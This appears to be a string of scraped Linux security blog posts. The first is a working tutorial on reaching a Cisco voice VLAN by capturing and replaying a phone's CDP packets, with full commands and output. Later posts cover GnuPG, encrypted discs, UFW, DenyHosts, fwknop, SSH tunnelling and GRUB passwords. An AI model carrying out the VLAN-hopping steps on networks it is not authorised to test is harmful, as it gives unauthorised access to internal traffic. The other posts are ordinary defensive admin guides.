Prerequisites
First, install two packages from your repositories. The vlan package adds a kernel module required for 802.1q VLAN tagging and the vconfig tool used to configure VLAN sub-interfaces. tcpreplay is a packet injection utility that we will use to replay CDP packets into the network from a pcap file.

sudo apt-get install vlan tcpreplay
sudo modprobe 8021q

The second command loads the 8021q kernel module. If you want the module loaded at boot-up, remember to add it to /etc/modules or the appropriate file for your GNU/Linux distribution.

Discover Voice-enabled Switch Port Information

Plug into the switched network, bypassing the VoIP phone, and perform a packet capture to inspect the switches CDP announcements. If the switch port is configured with a Voice VLAN, the configured VLAN identifier will be advertised. From our output below, the switch says we are plugged into port number FastEthernet0/24 and the Voice VLAN number is 64.

sudo tcpdump -s 0 -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
17:17:13.215645 CDPv2, ttl: 180s, checksum: 692 (unverified), length 404
Device-ID (0x01), length: 26 bytes: 'labswitch.example.com'
Version String (0x05), length: 186 bytes:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(50)SE1, RELEASE SOFTWARE (fc2)
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Mon 06-Apr-09 08:36 by amvarma
Platform (0x06), length: 21 bytes: 'cisco WS-C2960-24PC-L'
Address (0x02), length: 13 bytes: IPv4 (1) 10.1.1.1
Port-ID (0x03), length: 16 bytes: 'FastEthernet0/24'
Capability (0x04), length: 4 bytes: (0x00000028): L2 Switch, IGMP snooping
Protocol-Hello option (0x08), length: 32 bytes:
VTP Management Domain (0x09), length: 9 bytes: 'LABVTP'
Native VLAN ID (0x0a), length: 2 bytes: 1
Duplex (0x0b), length: 1 byte: full
ATA-186 VoIP VLAN request (0x0e), length: 3 bytes: app 1, vlan 64
AVVID trust bitmap (0x12), length: 1 byte: 0x00
AVVID untrusted ports CoS (0x13), length: 1 byte: 0x00
Management Addresses (0x16), length: 13 bytes: IPv4 (1) 10.1.1.1
unknown field type (0x1a), length: 12 bytes:
0x0000: 0000 0001 0000 0000 ffff ffff

Capture a Sample VoIP phone CDP Packet

Plug the Cisco VoIP phone back into the switch port and wait for it to come back online. Plug your laptop back into the data port of the phone in your typical daisy-chain topology. Use tcpdump again to capture a single CDP packet, saving it to a capture file. If you’re plugged into the phone, the only CDP packets you should see are those sent by the phone. These CDP packets should be neatly constructed with all of the appropriate voice VLAN values. From the switches perspective (and network administrators monitoring CDP tables), it will look exactly as if a phone is connected to the port, down to the phone model and serial number. ;-)

The following tcpdump filter looks for the CDP destination MAC address, stops after one packet, and saves it to a file called cdp-packet.cap. You will use this CDP packet capture file in your replay attack.

sudo tcpdump -s 0 -w cdp-packet.cap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
1 packets captured
1 packets received by filter
0 packets dropped by kernel

Verify the CDP packet details by reading the capture file with tcpdump. The following shows that everything is in order, including the VoIP VLAN Request for VLAN 64, which highlighted below.

sudo tcpdump -vr cdp-packet.cap
reading from file cdp-packet.cap, link-type EN10MB (Ethernet)
09:44:42.263551 CDPv2, ttl: 180s, checksum: 692 (unverified), length 125
Device-ID (0x01), length: 15 bytes: 'SEP0015626A51E9'
Address (0x02), length: 13 bytes: IPv4 (1) 10.1.64.10
Port-ID (0x03), length: 6 bytes: 'Port 2'
Capability (0x04), length: 4 bytes: (0x00000490): L3 capable
Version String (0x05), length: 12 bytes:
P00308010100
Platform (0x06), length: 19 bytes: 'Cisco IP Phone 7940'
Native VLAN ID (0x0a), length: 2 bytes: 1
Duplex (0x0b), length: 1 byte: full
ATA-186 VoIP VLAN request (0x0e), length: 3 bytes: app 1, vlan 64
AVVID trust bitmap (0x12), length: 1 byte: 0x00
AVVID untrusted ports CoS (0x13), length: 1 byte: 0x00


Replay CDP Packets to Spoof a Cisco VoIP Phone

You’ll want to unplug the phone from the switch and plug your computer into the switch port directly. Using the tcpreplay command, you can read and inject the contents of the packet capture file from the previous step, effectively spoofing the Cisco VoIP phone. When the switch receives this packet, the voice VLAN will be available to use.

sudo tcpreplay -i eth0 cdp-packet.cap
Actual: 1 packets (147 bytes) sent in 0.06 seconds
Rated: 2450.0 bps, 0.02 Mbps, 16.67 pps
Statistics for network device: eth0
Attempted packets: 1
Successful packets: 1
Failed packets: 0
Retried packets (ENOBUFS): 0
Retried packets (EAGAIN): 0

Once the Voice VLAN is enabled, you will only have a limited amount of time to use it. A typical Cisco phone will send a CDP packet every 60 seconds, so you can simulate this behavior by running your command in a timed loop. I prefer to use the watch command, and leave it running in a terminal until it’s no longer needed. Using the command below, the CDP packet will be replayed every 60 seconds.

sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap"

Access Voice VLAN with 802.1q Sub-interface

In order for you to access the voice VLAN, you must add a sub-interface for eth0 using the vconfig command. The following example uses vconfig to add a sub-interface that tags packets to access VLAN 64. The sub-interface will be named eth0.64 as shown below.

sudo vconfig add eth0 64
Added VLAN with VID == 64 to IF -:eth0:-

ifconfig eth0.64
eth0.64 Link encap:Ethernet HWaddr 00:26:b9:bc:5b:68
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:95 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4370 (4.3 KB) TX bytes:0 (0.0 B)

At this point you can access the VLAN in any fashion you see fit. For example, you can obtain an IP address via DHCP and test communication by pinging your default gateway as shown below.

sudo dhclient3 eth0.64
Listening on LPF/eth0.64/00:26:b9:bc:5b:68
Sending on LPF/eth0.64/00:26:b9:bc:5b:68
Sending on Socket/fallback
DHCPDISCOVER on eth0.64 to 255.255.255.255 port 67 interval 3
DHCPOFFER of 10.1.64.11 from 10.1.64.5
DHCPREQUEST of 10.1.64.11 on eth0.64 to 255.255.255.255 port 67
DHCPACK of 10.1.64.11 from 10.1.64.5
bound to 10.1.64.11 -- renewal in 35707 seconds.

ping -c 4 10.1.64.1
PING 10.1.64.1 (10.1.64.1) 56(84) bytes of data.
64 bytes from 10.1.64.1: icmp_seq=1 ttl=64 time=2.88 ms
64 bytes from 10.1.64.1: icmp_seq=2 ttl=64 time=2.85 ms
64 bytes from 10.1.64.1: icmp_seq=3 ttl=64 time=2.84 ms
64 bytes from 10.1.64.1: icmp_seq=4 ttl=64 time=2.30 ms

--- 10.1.64.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 2.303/2.721/2.888/0.244 ms

Mitigation… Aww, Bummer…

Unfortunately, there is currently no way to prevent this method of unauthorized voice VLAN access. Remember, this “vulnerability” is really just a limitation of the voice VLAN negotiation process. It’s not new (see the following Cisco security bulletin from 2005), but I suspect it will become a bigger problem as more organizations begin to deploy VoIP with little thought going into layered defenses and access protection.

There are some really cool projects dedicated to exploiting this vulnerability and similar weaknesses by other manufacturers. One such tool called VoIP Hopper completely automates the above process. It even comes with it’s own built-in DHCP client, and is kind enough to automatically generate pre-constructed CDP packets for you.

I hope you have found this tutorial useful. Feel free to add comments, suggestions, or drop me an email for confidential questions!

Related posts:

1. fwknop: Single Packet Authorization in Ubuntu
2. Generate Text From Templates, Scripts and CSV Data
3. VirtualBox Wireless Bridging with DHCP

For example, this is how you can encrypt a zip file called backup.zip and output the result to a new file called backup.zip.gpg.

gpg --symmetric --cipher-algo aes256 -o backup.zip.gpg backup.zip
Enter passphrase: *******
Repeat passphrase: *******

To decrypt the file, the following will work.

gpg -d -o backup.zip backup.zip.gpg
gpg: AES256 encrypted data
Enter passphrase: *******
gpg: encrypted with 1 passphrase

For fun, here’s how to create a Gzip Tar archive (tar.gz) and encrypt it on the fly.

tar czvpf - SomeFiles/ | gpg --symmetric --cipher-algo aes256 -o backup.tar.gz.gpg
Enter passphrase: *******
Repeat passphrase: *******

To decrypt and extract in a single command, the following also works.

gpg -d backup.tar.gz.gpg | tar xzvf -
gpg: AES256 encrypted data
Enter passphrase: *******
gpg: encrypted with 1 passphrase

If you’re curious to know what other ciphers are available to you, simple use the gpg --version command.

gpg --version | grep Cipher
Cipher: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH

Related posts:

1. Perform GnuPG Functions Within Vim
2. GnuPG Context Menu Options for Gnome Nautilus
3. RAR and UNRAR from Linux CLI

A much more flexible method for Linux users is to encrypt the entire CD or DVD with an AES symmetric key, and work with the data by simply mounting the disc. This means you don’t have to copy the files, they are simply presented to you as you would expect with an unencrypted disc.

Prerequisites

Prerequisites include loading the Cryptoloop kernel module and the installation of the Loop-AES toolset. Installing these packages in Ubuntu/Debian and loading the cryptoloop module is a snap.

sudo apt-get install aespipe loop-aes-utils
sudo modprobe cryptoloop

Verify that cryptoloop and AES kernel modules are loaded with lsmod.

lsmod | grep cryptoloop
cryptoloop             10880  0
loop                   23180  1 cryptoloop

lsmod | grep aes
aes_i586               15744  2
aes_generic            35880  1 aes_i586

If you had to load these modules by hand, make sure to add them to /etc/modules so that they are loaded on boot up.

Create, burn and mount encrypted images

To create a standard CD image, use genisofs (formally known as mkisofs), pipe the output to aespipe, and redirect the final output to an ISO file. Notice that we have specified that aespipe will use AES256 encryption, and it will has you to enter a password twice. Don’t lose it! ;)

genisoimage -quiet -r Documents/ | aespipe -T -e aes256 > documents.iso
Password: (enter password)
Retype password: (enter password)

Mount the image using the encryption option. The mounting process will ask you for the passphrase.

sudo mount -o loop,encryption=aes256 documents.iso /mnt
Password: (enter password)

Burn the disc image, replacing /dev/dvdrw with the appropriate value for your system. wodim was formerly known as cdrecord, so feel free to replace it with any command you are familiar with.

wodim dev=/dev/dvdrw documents.iso

Mount the CD/DVD using the same mount options as previously demonstrated.

sudo mount -o loop,encryption=aes256 /dev/dvdrw /mnt
Password: (enter password)

Work with your files as you would with any normal CD or DVD.

ls -l /mnt/
total 0
-r--r--r-- 1 root root 0 2008-11-26 17:09 secretfile1.txt
-r--r--r-- 1 root root 0 2008-11-26 17:09 secretfile2.txt
-r--r--r-- 1 root root 0 2008-11-26 17:09 secretfile3.txt
-r--r--r-- 1 root root 0 2008-11-26 17:09 secretfile4.txt

Related posts:

1. GRUB Password Security
2. Revelation Password Manager for Gnome
3. Perform GnuPG Functions Within Vim

In the following example, we will set up a very simple firewall adequate for almost anyone.

First, let’s check the status of UFW, and the currently installed iptables rule set. The following displays that UFW is disabled and that there are no rules for iptables INPUT chain.

Check firewall status

sudo ufw status
Firewall not loaded

sudo iptables -L INPUT -n | column -t
Chain             INPUT  (policy  DROP)
target            prot   opt      source     destination

Enable UFW

Now, let’s enable UFW and examine the change to iptables’ INPUT chain.

sudo ufw enable
Firewall started and enabled on system startup

sudo iptables -L INPUT -n | column -t
Chain             INPUT  (policy  DROP)
target            prot   opt      source     destination
ufw-before-input  all    --       0.0.0.0/0  0.0.0.0/0
ufw-after-input   all    --       0.0.0.0/0  0.0.0.0/0

The default policy was changed to drop all traffic, and two new chains are referenced. For a much better understanding of what the default rules are, take a look at the files “/etc/ufw/before.rules” and “/etc/ufw/after.rules“.

Connection Tracking

For your convenience, UFW also enables some very useful connection tracking rules, which intelligently inspect outbound application traffic and dynamically allows the return traffic for you. By default, TCP, UDP, FTP and IRC connection tracking modules are loaded, but others may be added to the IPT_MODULES variable in the file “/etc/default/ufw“.

For example, I sometimes need to use TFTP for sending and receiving firmware to and from routers. So I typically add “nf_conntrack_tftp” to the variable IPT_MODULES.

IPT_MODULES="nf_conntrack_ftp nf_nat_ftp nf_conntrack_irc nf_nat_irc nf_conntrack_tftp"

Remember to reload UFW so that the conntrack module is loaded.

sudo /etc/init.d/ufw restart

Allowing inbound services

If your system runs server applications such as DNS, SSH, TFTP and web, then you can add them to your firewall rules using these very simple commands. If you don’t run servers on your machine, this step can be skipped.

sudo ufw allow 53
sudo ufw allow 22/tcp
sudo ufw allow 69/udp
sudo ufw allow 80/tcp

Notice that the first command I used did not specify UDP or TCP. When omitted, UFW adds both protocols. DNS uses TCP for larger DNS exchanges like zone transfers and huge replies, so you’ll probably want both.

UFW displays the results very nicely.

sudo ufw status
Firewall loaded

To                         Action  From
--                         ------  ----
53:tcp                     ALLOW   Anywhere
53:udp                     ALLOW   Anywhere
22:tcp                     ALLOW   Anywhere
69:udp                     ALLOW   Anywhere
80:tcp                     ALLOW   Anywhere

SYN cookies and more

UFW can be used to load kernel options, too. These are defined in “/etc/ufw/sysctl.conf“. For example, I wanted to enable SYN cookies which was added to thwart certain TCP DoS attacks. Modify the following line to 1 in order to enable the feature.

net/ipv4/tcp_syncookies=1

Logging can suck

Okay, if you’re on a busy network and don’t want to fill up your syslog, you might want to disable UFW’s logging.

sudo ufw logging off

And really that’s all there is to it. Be sure to check out the man page for some more examples and features you may be interested in.

Related posts:

1. fwknop: Single Packet Authorization in Ubuntu
2. VLAN Hopping on Cisco Voice-enabled Switch Ports

1. (optional) Set the word wrap of text in Vim to a maximum text width of 70 characters. This can be done manually, or by simply adding the following text to your “~/.vimrc” file:

:set textwidth=70

2. As for the ability to clearsign, encrypt, decrypt and verify the text from within Vim, you can create command mode aliases as shortcuts for longer commands in Vim. Simply add the following to your “~/.vimrc” file:

:cmap cs %!gpg --clearsign
:cmap es %!gpg -seat
:cmap ee %!gpg -eat
:cmap de %!gpg -d

Once you save the changes to your .vimrc file, open any text file with vim, enter command mode, and type any of the shortcuts mentioned in step two; “cs” to clearsign, “es” to encrypt and sign, “ee” to encrypt with no signature, and “de” to decrypt or verify. The shortcut will display the command about to be issued, to which you can hit can enter to execute it. You will be prompted for recipients, and/or the private key passphrase depending on the function you choose.

If you are familiar with GnuPG syntax, you can change or add any of the above commands to your liking. For instance, for those of you with multiple PGP keys, you can add the “-u”option to specify which one you would like to use.

To wrap an existing unwrapped text file, simply higlight the entire message by placing the Vim cursor at the top of the file, press <shift>+V, followed by <shift>+G. This highlights all text as you will notice. While everything is highlighted, simply press “gq”. This will wrap everything according to your “textwidth” variable.

Feel free to test it out, and provide as much feedback as you like. Have fun.

Special Note:
When using the “textwidth” variable, you may find that it is useful to toggle the paste function. If you are pasting text that has a larger text width than that of which you have specified in Vim (in this case 70 characters), then your paste will automatically be word wrapped to 70.

You may not want this behavior, so the two opposing options you can set manually are:

:set paste
:set nopaste

Better yet, you can map a quick function key to toggle it on or off by adding the following to your .vimrc file:

:set pastetoggle=<F10>

To test, while in insert mode of Vim, press the F10 key, and you will notice that the mode will be clearly identified with:
"-- INSERT (paste) --"

This will allow you to paste text in it’s unwrapped form.

Related posts:

1. Vim in Color
2. Revelation Password Manager for Gnome
3. GRUB Password Security

DenyHosts is a project that adds a protective layer to an SSH server by automatically blocking malicious hosts that use brute force or dictionary attacks. If you have SSH services enabled and accessible from the internet, you will likely have thousands of failed login attempts from several sources within a very short period of time. DenyHosts monitors all login attempts, and based on a customizable rule-set can block hosts from making further connections if an attack pattern is matched.

Using tcp_wrappers, the DenyHosts service elegantly manages entries in the /etc/hosts.deny file, adding and removing hosts when thresholds are crossed. e.g. Three failed logins with unknown user accounts; Three failed logins with root account; Five failed logins with known user accounts; Unblock host after a set period of time; etc. You can also specify whether DenyHosts blocks access to SSH or ALL services, thereby mitigating any other attack vectors the offender might try next.

A most valuable feature that makes DenyHosts even more attractive is the optional centralized reporting system. The service can be configured to report all abusive hosts to the DenyHosts collection server, and automatically import a list of IP addresses that others have reported. This network of intelligence gathering and incident response helps to thwart a large number of attacks before they happen, because the attackers (most of which are automated bots) are blocked before they have a chance to move on to other protected servers.Other useful features include email notification when hosts are blocked, and counter resets after successful authentication to prevent accidental blacklisting caused by fat fingered admins. :-)

For those of you using Ubuntu 7.04 (Feisty Fawn) and above, it is available in the Universe repository:

sudo apt-get install denyhosts

Edit and customize /etc/denyhosts.conf for your desired options, and restart the service:

sudo /etc/init.d/denyhosts restart

Ubuntu 6.06.1 LTS will need a manual installation, as it is not included in the repositories.

Be sure to check out the project at http://denyhosts.sourceforge.net.

Related posts:

1. fwknop: Single Packet Authorization in Ubuntu
2. VirtualBox Wireless Bridging with DHCP
3. VLAN Hopping on Cisco Voice-enabled Switch Ports

Here’s a screenshot of the buttons that are added to the composition page in Gmail.

Be sure to check it out at: http://firegpg.tuxfamily.org/

No related posts.

Single Packet Authorization (SPA) using “fwknop” is probably one of the coolest recent innovations in server and network access control technology. Just what is SPA, you ask? SPA is a method of limiting access to server and network resources by cryptographically authenticating users before any type TCP/IP stack access is allowed.

In it’s simplest form, your Linux server can have an inbound firewall rule that by default drops all access to any of it’s listening services. Nmap scans will completely fail to detect any open ports, and zero-day attacks will not have any effect on vulnerable services since the firewall is blocking access to the applications.

The server however has a nifty trick up it’s sleeve. An authorized user sends a single encrypted UDP packet that is passively sniffed and analyzed by the fwknopd service running on the server using pcap. If successfully authenticated, fwknopd dynamically creates an iptables firewall rule, granting the source IP address of the authorized client access to the service for a defined period of time (default is 30 seconds). Pretty frickin’ cool, eh?

Okay, so here’s how to get it working in Ubuntu 7.04.

In this example, the service we will be protecting is SSH. I will be using a simple firewall rule that blocks all inbound connections, but has an unrestricted outbound policy. The client will authenticate using a GNUPG key pair.

1. We start by setting up the firewall. I’ve provided a firewall script below that should work for most configurations. Tailor this to your needs. Do NOT use this script unless you know for sure you want all traffic blocked.

$ wget http://www.savvyadmin.com/downloads/firewall
$ sudo cp firewall /etc/init.d/firewall
$ sudo chmod 755 /etc/init.d/firewall
$ sudo update-rc.d firewall defaults 10
$ sudo /etc/init.d/firewall start

2. Install fwknop prerequisites.

$ sudo apt-get install build-essential libpcap-dev mailx -y

3. Download latest version of fwknop from the official website, and install.

Site: http://www.cipherdyne.org/fwknop/download/

$ wget http://www.cipherdyne.org/fwknop/download/fwknop-1.8.1.tar.gz
$ tar zxvf fwknop-1.8.1.tar.gz
$ cd fwknop-1.8.1
$ sudo ./install.pl

(The installer will ask you a couple of questions. You will need to provide the interface you wish the service to monitor, and specify that the installation should run as a server).

$ sudo update-rc.d fwknop defaults 20

4. You (the client) and the server should use individualized PGP key pairs for this to work as securely as possible. The client will use it’s own private key to digitally sign the SPA packet payload, and then use the servers public key to encrypt it as well. The server will use the clients public key and digital signature to verify that the SPA packet originated from a trusted source. This means that both the server and the client will need a signed copy of each others public keys in their keyring.

The instructions on how to generate these key pairs are located at:

http://www.cipherdyne.org/fwknop/docs/gpghowto.html

Once you have followed the sites instructions, you’re almost ready to have SPA working. I know it’s a lot to take in if you are not familiar with the concepts behind the PGP cryptosystem, so make sure to read up on it if you’re feeling a bit lost. Gnupg’s manual is located here.

5. As also mentioned in the above referenced article, you will need to edit the fwknop configuration file “/etc/fwknop/access.conf”. An example of this configuration is shown below.

SOURCE: ANY;
OPEN_PORTS: tcp/22;
DATA_COLLECT_MODE: PCAP;
GPG_HOME_DIR: /root/.gnupg;
GPG_DECRYPT_ID: SERVER_KEY_ID;
GPG_DECRYPT_PW: PASSWORD_HERE;
GPG_REMOTE_ID: CLIENT_KEY_ID;
FW_ACCESS_TIMEOUT: 30;

6. Start the fwknopd service:

$ sudo /etc/init.d/fwknop start

7. You should now be ready to test things out using another computer with the fwknop client. You install everything exactly the same as the server, with the exception of specifying that the installer should run fwknop as a client.

The typical authorization process from client to server can be completed as follows.

$ fwknop -A tcp/22 --gpg-recip SERVER_KEY --gpg-sign CLIENT_KEY -w -k SERVER_IP

The “-w” flag queries www.whatismyip.com for the clients real ip address and uses that as the source address. This is useful when you are behind a NAT firewall, since the source address specified on the SPA packet would otherwise be a local address.

If you are on the same network as the server, or simply do not have to worry about NAT, the syntax would be as follows:

$ fwknop -A tcp/22 --gpg-recip SERVER_KEY --gpg-sign CLIENT_KEY -a CLIENT_IP -k SERVER_IP

If successful, your server adds the appropriate access list entry for you to connect using your ssh client. You will have 30 seconds to make the connection, after which the access list is dynamically removed.

$ ssh username@SERVER_IP

It is important to note that the SPA packet is sent to the servers IP address using the destination port of UDP/62201. You must ensure that this port number is allowed outbound from the network you are connecting from, and that no router or firewall is blocking it from reaching your server.

It should also be noted that the time stamp embedded in the SPA packet must fall within 120 seconds of the servers clock. You should make sure that both the server and client are using NTP to keep their clocks as close as possible.

Check out your syslogs and iptables output for useful information while testing.

$ watch -n1 sudo iptables -L -n
$ tail -f /var/log/syslog

Hope this provides you with some very useful information to get you started with SPA.

Related posts:

1. Ubuntu’s Uncomplicated Firewall (UFW)
2. DenyHosts: Automated SSH Brute Force Response System
3. VLAN Hopping on Cisco Voice-enabled Switch Ports

Or better yet, you can use a nifty password manager for the Linux platform call Revelation. It’s written for tight integration with the Gnome desktop environment.

Home page: http://oss.codepoet.no/revelation/

The passwords are stored in an encrypted XML file, protected by AES encryption and of course a master passphrase.

It has most of the core functionality one would expect from a mature password manager, including a nice internal directory structure to organize your data, copy and paste, and customizable viewing options.

Definitely worth checking out. Ubuntu 7.04 universe repositories have the latest version available for download.

$ sudo apt-get install revelation

Launch it from Applications -> Accessories -> Revelation Password Manager.

Related posts:

1. GRUB Password Security
2. PAM_KEYRING: Automatic Keyring Authentication
3. Create Encrypted CD’s and DVD’s in Linux

All you need is external access to a trusted OpenSSH server, perhaps the one you have at home, work, etc. If you’re using your laptop to surf the internet at your local coffee shop, you’ll simply need to establish a connection to that external SSH server using the appropriate client variables, and configure your web browser’s proxy settings to connect to a locally defined TCP port.

From a Linux terminal session on your local computer, run the following command:

$ ssh -ND 8080 user@server.yourdomain.com

You will be prompted for a password as you would normally expect when connecting to your server. After you make a successful connection, the session does not execute your default shell, and the command will remain silent until you close the console or terminate the process.

The “-D 8080″ option opens TCP port 8080 on your local client, which you will use as the SOCKS proxy port to tunnel your connections through. This can be verified via netstat:

$ netstat -an | grep 8080
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN

Next, you change your browser (or any other application) proxy settings to connect to your localhost (127.0.0.1) port 8080. For example, here is a screenshot of the appropriate Firefox settings.

You should also make sure that your web browser is using the proxy for DNS queries. This is important because even if people cannot “see” the content of your browser traffic, they would still be able to get a feel for what your are doing by your DNS lookups. There is also a risk of a malicious user feeding you dangerous DNS answers which could send you in the wrong direction leaving you open to man in the middle attacks.

In firefox, open “about:config” in your location bar, and change the value of “network.proxy.socks_remote_dns” to “true”.

You are now ready to surf securely.

No related posts.

If your system is using a default installation of GRUB as it’s boot loader, chances are it has not been set up with a password.

When at the GRUB menu, one can edit the kernel selection by highlighting the menu item, and pressing the “e” button. By editing the “kernel” entry, they can pass any number of boot variables and options. For instance, the options “init 1″ or “single” boot the operating system into “single user” mode (run level 1), which drops you into a root prompt with no authentication necessary.

For example, the kernel option would look like the following:

kernel /boot/vmlinuz-2.6.15-27-686 root=/dev/hda1 ro quiet init 1

or

kernel /boot/vmlinuz-2.6.15-27-686 root=/dev/hda1 ro quiet single

Ubuntu actually installs a “recovery” GRUB menu item already configured for you. How nice of them!

Of course, anyone with prolonged physical access to your server can do a lot more damage. Configuring a GRUB password can be likened to installing and locking your “screen door”. It can slow down or even discourage a potential intruder.

Instructions:

Step 1: Generate an MD5 hashed password using the “grub-md5-crypt” command line utility. Enter the command, and it will prompt you twice for any password of your choice.

grub-md5-crypt
Password: (enter password)
Retype password: (reenter password)
$1$aBQge1$oljHKOKAPuiOkvUTTzPc80


Step 2: Copy the resulting hash into /boot/grub/menu.lst using the following syntax:

password --md5 $1$aBQge1$oljHKOKAPuiOkvUTTzPc80

Step 3: Lock alternative boot options by changing the “lockalternatives” value to “true”. This option will make it mandatory for the administrative password to be entered prior to using the alternative menu item (recovery mode).

# lockalternative=true

Step 4: lock old kernel menu items, as they may have present their own security issues.

# lockold=true

Step 3: Save changes by updating grub, and then reboot to test.

sudo update-grub

You should notice that GRUB now instructs you to press “p” to enter a password in order for you to edit the kernel options, boot into single user mode or older kernels.

Related posts:

1. Create Encrypted CD’s and DVD’s in Linux
2. Revelation Password Manager for Gnome
3. Perform GnuPG Functions Within Vim